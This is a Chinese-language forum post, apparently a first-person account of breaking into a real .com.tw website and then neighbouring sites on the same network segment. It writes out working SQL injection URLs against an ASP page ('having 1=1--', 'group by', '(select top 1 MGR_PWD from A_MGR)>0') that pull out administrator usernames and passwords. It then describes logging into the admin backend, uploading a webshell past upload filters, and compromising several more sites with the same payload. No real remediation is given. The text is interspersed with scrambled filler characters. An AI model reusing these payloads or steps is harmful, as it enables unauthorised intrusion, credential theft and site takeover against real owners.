发现一个注入点0 ~9 G1 E0 _ |4 g: a
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
) {' q d* s. V( Y& R9 ^: P4 v2 C- i0 M. G+ s( r
习惯性的加’having1=1--
1 c5 w* k; C$ {" _6 m6 u# y9 f0 n2 p9 p
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
& ?6 ]9 ~1 C$ [2 g9 U, M2 v$ R1 G5 q; P
0/ y2 V- C: n: _9 q! f) t: ^& M5 O
1 i. w$ t5 b( y& b, g" t. i爆出Diary_A.dl_Title(这时候很激动啊)4 \# ?. Y! p+ W9 `, M9 l8 Q" z
$ L- {2 E! Y! h! O; ^1 P) ~
那么继续
" b! d7 Y4 G* bhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1— }" c9 @& Z S2 @
. ]6 A1 B8 w" b! Y/ S
继续,一直爆下去
( {1 g; t3 J! x! x, d, B8 s, M: K3 ?4 |0 z
爆到几个字段和表段 但是没找到需要的管理用户的字段' W$ g- ], [& q+ d( l
. A! Z$ N4 L9 B' _" Z1 l/ M
蛋疼了 怎么办 然后去后台登陆页看源码
7 Q( W/ t8 U K' x2 M
1 d+ Y: n P4 K2 n, P01 L% l& [! l+ @8 I$ v: t/ k
) f6 b" V' L. b
Input name= “ADUID”; m8 ?: U9 V I+ K& B% g
Input name= “ADPWD”
! {. q% k" q2 J0 W$ o' g: d, H6 y1 [
" A* ~7 _* w5 Z; M9 x4 A8 i- F很幸运 找到了字段那就继续
2 E& `4 q% f3 N2 A5 _, \6 I找到之后开始爆用户
N$ `8 P! [' ~http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—" d" @" d4 c( Y `" Q; s9 q
爆密码
6 w% E* _& p) Lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
% o+ b' a- g1 `# }4 r( }: B& U2 w2 {测试了下 这个注入点只能爆到文章哪里的表 7 ]3 f4 y' O4 M5 t- _
7 J/ j- s6 G# D5 z% H4 b! T头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了4 q" C+ R$ o9 ]3 ~' b
: D6 a4 C/ a1 J4 R. x8 x$ ~ _又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了$ y9 u) _' ~/ [2 L$ `2 O
/ p# E( ~& f! U9 A473" a* V) s# @& e* y9 n n9 |" e
$ {: L3 L2 n2 j9 i" z9 h
进后台! b$ u, W5 z+ A8 g% D
4 M" ]7 R) V$ {" P. `
9 v7 w5 M, O# b* C1 x发现几个上传点 有的地方不能上传 而且防止恶意代码
9 i! P( Q% q8 A6 ^7 G
* v, n1 Y. F. g: a8 F+ n" v没办法 各种百度各种找大牛 找到一只好像可以突破的马
* W. v# Q& @5 A5 R' M0 b; Z7 g' h2 x5 R+ j
& K1 f; b8 c# d" V! O, u4 Y
在系统管理那里直接上传 不过没有显示地址5 s- |. O/ S. G/ ?6 t* ]
1 \" a# i' g5 B6 v1 h4 w* M: _再上传一次 抓包 搞定OK/ @8 C) ^( i+ A, L
* `9 }' U- I8 \/ }- g2 m3 T1 v6 C9 a* i7 c/ v" Z1 F- t8 P, M. N- b
# Q4 t8 Y% v$ R1 z& n5 `. g( p% ?# k
472* { s; P6 Z# ]8 T+ Y
+ j1 H. b Y, J4 W, \9 b晚上不行了 去睡觉。。。9 w& G: d5 C4 B, r8 l$ M
第二天刚起床 闲的没事做继续日站吧
; a0 S0 e1 ]! d- p7 E4 v0 {$ Y5 ?6 N: e6 H: r& z7 ?
找个站 就把这个站的旁c扫了下" [! G; W% Y x4 v9 d3 l
/ q% L4 Q# U: O4 ?# a
发现c段也有一个购物站 ,然后还和这个站的模板差不多
) _9 W- ] M8 Y. G% t
. I" b: B- ]7 k3 S x7 D) {就找到会员登录口测试
( ~+ S7 a* `! [& L G) @6 z( i) Z6 L& v& c2 p" Q* \
'and (select top 1 MGR_UID from A_MGR)>0—
& w1 B, m( K$ R9 \, W果断爆到了 这时候我很激动 通杀
1 {5 G# z4 G! t) `
0 r9 B1 m2 X9 D: {. O# X再次翻c段6 i4 P+ m G, F! Q
8 ^$ U: {: |3 v9 E5 q$ }2 Z1 w翻出几个站 都成功拿下
9 `- A+ _( \) [, q( y* H! ]! C
, I8 U% l' H' J7 c$ J0 {9 Q7 v+ u$ [# p1 J$ x0 O4 z
) z# d; c7 ^' R/ b s. z5 W+ O修复方案:# \8 q! _, Y) J) p- m; M& A9 k
他们比我专业 3 L M. T% w: `2 J) i, F
$ K g% a+ E. {
6 w/ Y3 s% _# d* N* o. e; @& Q; @5 ~
|